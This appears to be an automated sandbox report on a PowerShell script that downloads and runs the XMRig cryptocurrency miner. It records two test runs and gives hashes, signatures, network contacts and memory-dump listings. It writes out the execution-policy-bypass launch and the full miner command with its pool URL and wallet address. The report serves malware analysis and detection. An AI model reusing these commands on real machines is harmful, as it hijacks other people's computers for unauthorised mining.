memory/4196-9-0x000001F2FB080000-0x000001F2FB0F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oc10xnqt.d4z.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4196-10-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/4196-25-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/4196-48-0x000001F2FB040000-0x000001F2FB052000-memory.dmp
memory/4196-61-0x000001F2FAEE0000-0x000001F2FAEEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5052-90-0x000001B0183A0000-0x000001B0183C0000-memory.dmp
memory/5052-91-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/4196-92-0x00007FFF9ADA3000-0x00007FFF9ADA4000-memory.dmp
memory/4196-93-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/5052-94-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/4196-95-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/5052-96-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-97-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-98-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-99-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-100-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-101-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-102-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-103-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-104-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-105-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-106-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-107-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-108-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-109-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-110-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-111-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-112-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-113-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-114-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-115-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-116-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-117-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-118-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-119-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-120-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-121-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-122-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-123-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-124-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-125-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-126-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-127-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-128-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-129-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-130-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-131-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-132-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-133-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-134-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-135-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-136-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-137-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-138-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-139-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-140-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-141-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-142-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-143-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-144-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-145-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-146-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-147-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-148-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-149-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-150-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-151-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-152-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-153-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-154-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-155-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-156-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win10v2004-20240426-en
Max time kernel
1789s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1468 wrote to memory of 3156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1468 wrote to memory of 3156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.173.79.40.in-addr.arpa | udp |
Files
memory/1468-0-0x00007FFB1E913000-0x00007FFB1E915000-memory.dmp
memory/1468-6-0x000001D9D3550000-0x000001D9D3572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cbduaeo.gr3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1468-11-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/1468-12-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/1468-14-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/1468-15-0x000001D9D36E0000-0x000001D9D36F2000-memory.dmp
memory/1468-16-0x000001D9D36C0000-0x000001D9D36CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3156-47-0x0000026E6AEF0000-0x0000026E6AF10000-memory.dmp
memory/3156-48-0x0000026E6AF40000-0x0000026E6AF60000-memory.dmp
memory/3156-49-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-52-0x0000026E6AF60000-0x0000026E6AF80000-memory.dmp
memory/3156-51-0x0000026E6C840000-0x0000026E6C860000-memory.dmp
memory/3156-50-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/1468-53-0x00007FFB1E913000-0x00007FFB1E915000-memory.dmp
memory/1468-54-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/3156-55-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/1468-56-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/3156-57-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-58-0x0000026E6C840000-0x0000026E6C860000-memory.dmp
memory/3156-59-0x0000026E6AF60000-0x0000026E6AF80000-memory.dmp
memory/3156-60-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-61-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-62-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-63-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-64-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-65-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-66-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-67-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-68-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-69-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-70-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-71-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-72-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-73-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-74-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-75-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-76-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-77-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-78-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-79-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-80-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-81-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-82-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-83-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-84-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-85-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-86-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-87-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-88-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-89-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-90-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-91-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-92-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-93-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-94-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-95-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-96-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-97-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-98-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-99-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-100-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-101-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-102-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-103-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-104-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-105-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-106-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-107-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-108-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-109-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-110-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-111-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-112-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-113-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-114-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-115-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-116-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-117-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-118-0x00007FF742B20000-0x00007FF743753000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:11
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1754s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2084 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2084 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/2084-3-0x00007FFB31903000-0x00007FFB31904000-memory.dmp
memory/2084-5-0x0000024FB11D0000-0x0000024FB11F2000-memory.dmp
memory/2084-7-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
memory/2084-11-0x0000024FCA240000-0x0000024FCA2B6000-memory.dmp
memory/2084-10-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_of3dc53w.dab.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2084-27-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
memory/2084-51-0x0000024FCA220000-0x0000024FCA232000-memory.dmp
memory/2084-64-0x0000024FCA200000-0x0000024FCA20A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1700-93-0x0000020C49AE0000-0x0000020C49B00000-memory.dmp
memory/1700-94-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/2084-95-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
memory/2084-97-0x00007FFB31903000-0x00007FFB31904000-memory.dmp
memory/1700-96-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-98-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-99-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-100-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-101-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-102-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-103-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-104-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-105-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-106-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-107-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-108-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-109-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-110-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-111-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-112-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-113-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-114-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-115-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-116-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-117-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-118-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-119-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
